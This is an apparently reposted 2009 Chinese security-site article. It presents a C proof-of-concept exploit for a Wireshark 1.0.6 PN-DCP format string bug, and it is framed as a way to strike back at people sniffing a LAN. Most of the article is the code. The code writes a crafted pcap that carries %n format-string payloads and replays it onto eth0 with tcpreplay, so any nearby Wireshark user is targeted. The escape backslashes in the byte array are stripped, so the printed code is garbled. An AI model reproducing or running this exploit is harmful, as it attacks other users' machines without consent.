首页 > 安全 > 系统安全 >

对付局域网嗅探的人,这个有点意思

2009-04-06

作者:friddy 如有人在用wireshark嗅探,就播放这个数据   /*################## THCX ######################################## Wireshark <= 1.0.6 PN-DCP format string bug POC##########################################

作者:friddy
如有人在用wireshark嗅探,就播放这个数据

/*
################## THCX #######################################
# Wireshark <= 1.0.6 PN-DCP format string bug POC
###############################################################
# [!] autore: THCX Labs
# [!] PN-DCP eithor standalone or tunneld thru DCE/RPC
# [!] local open of pcapfile also working
###############################################################
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
char sploit[]=
"xd4xc3xb2xa1x02x00x04x00x00x00x00x00x00x00x00x00xffxffx00x00x01x00x00x00"
"x96x2cx8fx47x97xaax0dx00x22x00x00x00x22x00x00x00x00x02xe3x17xc7x50x00x80"
"xc8x38xa4x8bx81x00x00x00x88x92xfexfex05x00x01x00x00x01x00x01x00x04xffxff"
"x00x00x96x2cx8fx47x96xaex0dx00xd6x00x00x00xd6x00x00x00x00x80xc8x38xa4x8b"
"x00x02xe3x17xc7x50x81x00x00x00x88x92xfexffx05x01x01x00x00x01x00x00x00xb8"
"x02x05x00x10x00x00x02x01x02x02x02x03x02x04x02x05x01x01x01x02x02x01x00x0a"
"x00x00x53x37x2dx33x30x30x45x43x02x02x00x6ex00x00x25x6ex25x6ex25x6ex20x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x02x03x00x06x00x00x00x2ax01x01x02x04x00x04x00x00x02x00x01x02"
"x00x0ex00x01xc0xa8x00x0bxffxffxffx00xc0xa8x00x0bx97x2cx8fx47xf2xd0x0ex00"
"x32x00x00x00x32x00x00x00x00x02xe3x17xc7x50x00x80xc8x38xa4x8bx81x00x00x00"
"x88x92xfexfdx04x00x01x00x00x01x00x00x00x14x02x02x00x09x00x01x25x6ex25x6e"
"x25x6ex20x00x05x02x00x02x00x00x97x2cx8fx47x82xd2x0ex00x40x00x00x00x40x00"
"x00x00x00x80xc8x38xa4x8bx00x02xe3x17xc7x50x81x00x00x00x88x92xfexfdx04x01"
"x01x00x00x01x00x00x00x10x05x04x00x03x02x02x00x00x05x04x00x03x05x02x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00";
int main(){
FILE *fh;
int r;
fh=fopen("formatstringbug.pcap","wb");
if(!fh){perror("no open");exit(1);}
fwrite(sploit,sizeof sploit,1,fh);
fclose(fh);
r=system("tcpreplay -i eth0 formatstringbug.pcap");
return 0;
}

相关文章
最新文章
热点推荐